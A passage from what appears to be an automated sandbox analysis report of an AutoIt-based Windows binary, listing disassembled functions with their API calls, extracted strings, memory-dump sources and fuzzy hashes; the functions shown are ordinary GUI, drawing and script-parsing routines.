                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 0018D151
                                                                                                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 0018D17C
                                                                                                                                                          • GetSysColor.USER32(00000010), ref: 0018D184
                                                                                                                                                          • CreateSolidBrush.GDI32(00000000), ref: 0018D18B
                                                                                                                                                          • FrameRect.USER32(?,?,00000000), ref: 0018D19A
                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 0018D1A1
                                                                                                                                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 0018D1EC
                                                                                                                                                          • FillRect.USER32(?,?,00000000), ref: 0018D21E
                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0018D249
                                                                                                                                                            • Part of subcall function 0018D385: GetSysColor.USER32(00000012), ref: 0018D3BE
                                                                                                                                                            • Part of subcall function 0018D385: SetTextColor.GDI32(?,?), ref: 0018D3C2
                                                                                                                                                            • Part of subcall function 0018D385: GetSysColorBrush.USER32(0000000F), ref: 0018D3D8
                                                                                                                                                            • Part of subcall function 0018D385: GetSysColor.USER32(0000000F), ref: 0018D3E3
                                                                                                                                                            • Part of subcall function 0018D385: GetSysColor.USER32(00000011), ref: 0018D400
                                                                                                                                                            • Part of subcall function 0018D385: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0018D40E
                                                                                                                                                            • Part of subcall function 0018D385: SelectObject.GDI32(?,00000000), ref: 0018D41F
                                                                                                                                                            • Part of subcall function 0018D385: SetBkColor.GDI32(?,00000000), ref: 0018D428
                                                                                                                                                            • Part of subcall function 0018D385: SelectObject.GDI32(?,?), ref: 0018D435
                                                                                                                                                            • Part of subcall function 0018D385: InflateRect.USER32(?,000000FF,000000FF), ref: 0018D454
                                                                                                                                                            • Part of subcall function 0018D385: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0018D46B
                                                                                                                                                            • Part of subcall function 0018D385: GetWindowLongW.USER32(00000000,000000F0), ref: 0018D480
                                                                                                                                                            • Part of subcall function 0018D385: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0018D4A8
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3521893082-0
                                                                                                                                                          • Opcode ID: 4e0803328cf0b3e2f4b17eabca21a8cbfadce72a6dfa0d7c321489a608243a6f
                                                                                                                                                          • Instruction ID: f46362c692433901a61ff9db9c98dcf1295001dffa65972149f5109614a818bf
                                                                                                                                                          • Opcode Fuzzy Hash: 4e0803328cf0b3e2f4b17eabca21a8cbfadce72a6dfa0d7c321489a608243a6f
                                                                                                                                                          • Instruction Fuzzy Hash: DB916071408701AFDB10AF64EC48E5BBBB9FF86325F100A19F962969E0D771DA84CF52
                                                                                                                                                          Function 0017A3F7 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • DestroyWindow.USER32(00000000), ref: 0017A42A
                                                                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0017A4E9
                                                                                                                                                          • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 0017A527
                                                                                                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 0017A539
                                                                                                                                                          • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 0017A57F
                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0017A58B
                                                                                                                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 0017A5CF
                                                                                                                                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0017A5DE
                                                                                                                                                          • GetStockObject.GDI32(00000011), ref: 0017A5EE
                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0017A5F2
                                                                                                                                                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 0017A602
                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0017A60B
                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 0017A614
                                                                                                                                                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0017A642
                                                                                                                                                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 0017A659
                                                                                                                                                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 0017A694
                                                                                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0017A6A8
                                                                                                                                                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 0017A6B9
                                                                                                                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0017A6E9
                                                                                                                                                          • GetStockObject.GDI32(00000011), ref: 0017A6F4
                                                                                                                                                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 0017A6FF
                                                                                                                                                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 0017A709
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                          • API String ID: 2910397461-517079104
                                                                                                                                                          • Opcode ID: 484351b73e68856bd071a56e298d175fa82e04e860830f8fe06221f43a3a4aaa
                                                                                                                                                          • Instruction ID: 335dc3cd21288463531400284a30936658e7f6740cace20452da610c68baf671
                                                                                                                                                          • Opcode Fuzzy Hash: 484351b73e68856bd071a56e298d175fa82e04e860830f8fe06221f43a3a4aaa
                                                                                                                                                          • Instruction Fuzzy Hash: FDA16F71A40655BFEB14DBA4DC8AFAEBBB9EF45710F008114F615AB6E0D7B0AD40CB60
                                                                                                                                                          Function 0016E44C Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0016E45E
                                                                                                                                                          • GetDriveTypeW.KERNEL32(?,001BDC88,?,\\.\,001BDBF0), ref: 0016E54B
                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,001BDC88,?,\\.\,001BDBF0), ref: 0016E6B1
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorMode$DriveType
                                                                                                                                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                          • API String ID: 2907320926-4222207086
                                                                                                                                                          • Opcode ID: e20b107505390775b708ff74b19b2537a062dc9c3ba95888337d375a85d46be4
                                                                                                                                                          • Instruction ID: a9433ba614505ba8dd49f0abd83a2e6932c87c9c99f3876f1911c6d02be9cd0e
                                                                                                                                                          • Opcode Fuzzy Hash: e20b107505390775b708ff74b19b2537a062dc9c3ba95888337d375a85d46be4
                                                                                                                                                          • Instruction Fuzzy Hash: EB51D378208301ABC604EB14DC9182AB7D1BBA5704F128B2BF456EB291EB60DE65DB53
                                                                                                                                                          Function 0012C714 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 245COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: __wcsnicmp
                                                                                                                                                          • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                                                          • API String ID: 1038674560-86951937
                                                                                                                                                          • Opcode ID: 2b767168984348e07136d959fe5b325fb5ba6f50e44e1d729c2ea6fda600e3dc
                                                                                                                                                          • Instruction ID: 20e0add45b0ee1aa63b9c197b43edb3c44d595dc2b334af1110e7b2b931d17e5
                                                                                                                                                          • Opcode Fuzzy Hash: 2b767168984348e07136d959fe5b325fb5ba6f50e44e1d729c2ea6fda600e3dc
                                                                                                                                                          • Instruction Fuzzy Hash: 57612B3164032677DB29AA64BC83FBF3398EF25740F144025FE55A71D2EB60DA61C6E1
                                                                                                                                                          Function 001248C8 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 491windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • DestroyWindow.USER32 ref: 00124956
                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00124998
                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 001249A3
                                                                                                                                                          • DestroyCursor.USER32(00000000), ref: 001249AE
                                                                                                                                                          • DestroyWindow.USER32(00000000), ref: 001249B9
                                                                                                                                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 0019E179
                                                                                                                                                          • 6FC10200.COMCTL32(?,000000FF,?), ref: 0019E1B2
                                                                                                                                                          • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0019E5E0
                                                                                                                                                            • Part of subcall function 001249CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00124954,00000000), ref: 00124A23
                                                                                                                                                          • SendMessageW.USER32 ref: 0019E627
                                                                                                                                                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0019E63E
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DestroyMessageSendWindow$DeleteObject$C10200CursorInvalidateMoveRect
                                                                                                                                                          • String ID: 0
                                                                                                                                                          • API String ID: 3760363253-4108050209
                                                                                                                                                          • Opcode ID: 99d1a216076addc5c9e903b9c29101914135da57c914c01fddd4fde96363e4d0
                                                                                                                                                          • Instruction ID: ad884078f57f79577e8a16e76ff68826405e07dff2650cd7031949b965a89f56
                                                                                                                                                          • Opcode Fuzzy Hash: 99d1a216076addc5c9e903b9c29101914135da57c914c01fddd4fde96363e4d0
                                                                                                                                                          • Instruction Fuzzy Hash: 6B12BF30600611EFDF24CF24D884BAABBE5BF19304F144569F99ADB662C731EC95CB91
                                                                                                                                                          Function 0018C4F9 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 447windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0018C598
                                                                                                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0018C64E
                                                                                                                                                          • SendMessageW.USER32(?,00001102,00000002,?), ref: 0018C669
                                                                                                                                                          • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0018C925
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend$Window
                                                                                                                                                          • String ID: 0
                                                                                                                                                          • API String ID: 2326795674-4108050209
                                                                                                                                                          • Opcode ID: 1fabd79d8c4d8586938b9a56e2dd2f43015808189d91903ad7138b544139de38
                                                                                                                                                          • Instruction ID: 6da3e7281d38737b4e7db9bb093e7b496974e4f46965e8bc4f47c63e03d8da0a
                                                                                                                                                          • Opcode Fuzzy Hash: 1fabd79d8c4d8586938b9a56e2dd2f43015808189d91903ad7138b544139de38
                                                                                                                                                          • Instruction Fuzzy Hash: 27F1F371204741AFE719EF24C885BAABBE4FF49354F080629F589976A1D770DA40CFE2
                                                                                                                                                          Function 00186189 Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CharUpperBuffW.USER32(?,?,001BDBF0), ref: 00186245
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: BuffCharUpper
                                                                                                                                                          • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                                                          • API String ID: 3964851224-45149045
                                                                                                                                                          • Opcode ID: 0ffbf28d59feafbdbe7e1f94e4cdcaa52bbd61b5a6a81c3fb653957927e572a1
                                                                                                                                                          • Instruction ID: e99a5794257ee4405d720dde9d98f6ab46dcf1039988a418aab3ea17d44fe98a
                                                                                                                                                          • Opcode Fuzzy Hash: 0ffbf28d59feafbdbe7e1f94e4cdcaa52bbd61b5a6a81c3fb653957927e572a1
                                                                                                                                                          • Instruction Fuzzy Hash: 51C16034604201CFCB08FF54D551A6E77A6AFA4394F14486DF8966B3A6DB31DE0ACF82
                                                                                                                                                          Function 0018D385 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetSysColor.USER32(00000012), ref: 0018D3BE
                                                                                                                                                          • SetTextColor.GDI32(?,?), ref: 0018D3C2
                                                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 0018D3D8
                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 0018D3E3
                                                                                                                                                          • CreateSolidBrush.GDI32(?), ref: 0018D3E8
                                                                                                                                                          • GetSysColor.USER32(00000011), ref: 0018D400
                                                                                                                                                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0018D40E
                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 0018D41F
                                                                                                                                                          • SetBkColor.GDI32(?,00000000), ref: 0018D428
                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 0018D435
                                                                                                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 0018D454
                                                                                                                                                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0018D46B
                                                                                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0018D480
                                                                                                                                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0018D4A8
                                                                                                                                                          • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0018D4CF
                                                                                                                                                          • InflateRect.USER32(?,000000FD,000000FD), ref: 0018D4ED
                                                                                                                                                          • DrawFocusRect.USER32(?,?), ref: 0018D4F8
                                                                                                                                                          • GetSysColor.USER32(00000011), ref: 0018D506
                                                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 0018D50E
                                                                                                                                                          • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0018D522
                                                                                                                                                          • SelectObject.GDI32(?,0018D0B5), ref: 0018D539
                                                                                                                                                          • DeleteObject.GDI32(?), ref: 0018D544
                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 0018D54A
                                                                                                                                                          • DeleteObject.GDI32(?), ref: 0018D54F
                                                                                                                                                          • SetTextColor.GDI32(?,?), ref: 0018D555
                                                                                                                                                          • SetBkColor.GDI32(?,?), ref: 0018D55F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1996641542-0
                                                                                                                                                          • Opcode ID: da55a0ad9402962bcec12c4e379e08b04f281fb5493988e68869dea15d87c4d6
                                                                                                                                                          • Instruction ID: 60e6bb0a7c1428075f14af94fab2c2590805a9ddb0da60e5087529e3784b4d8e
                                                                                                                                                          • Opcode Fuzzy Hash: da55a0ad9402962bcec12c4e379e08b04f281fb5493988e68869dea15d87c4d6
                                                                                                                                                          • Instruction Fuzzy Hash: 3F514DB1900608BFDF10AFA4EC48EAE7BB9FF09320F114515F916AB6A1D7719A80CF50
                                                                                                                                                          Function 0018B4D4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0018B5C0
                                                                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0018B5D1
                                                                                                                                                          • CharNextW.USER32(0000014E), ref: 0018B600
                                                                                                                                                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0018B641
                                                                                                                                                          • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0018B657
                                                                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0018B668
                                                                                                                                                          • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0018B685
                                                                                                                                                          • SetWindowTextW.USER32(?,0000014E), ref: 0018B6D7
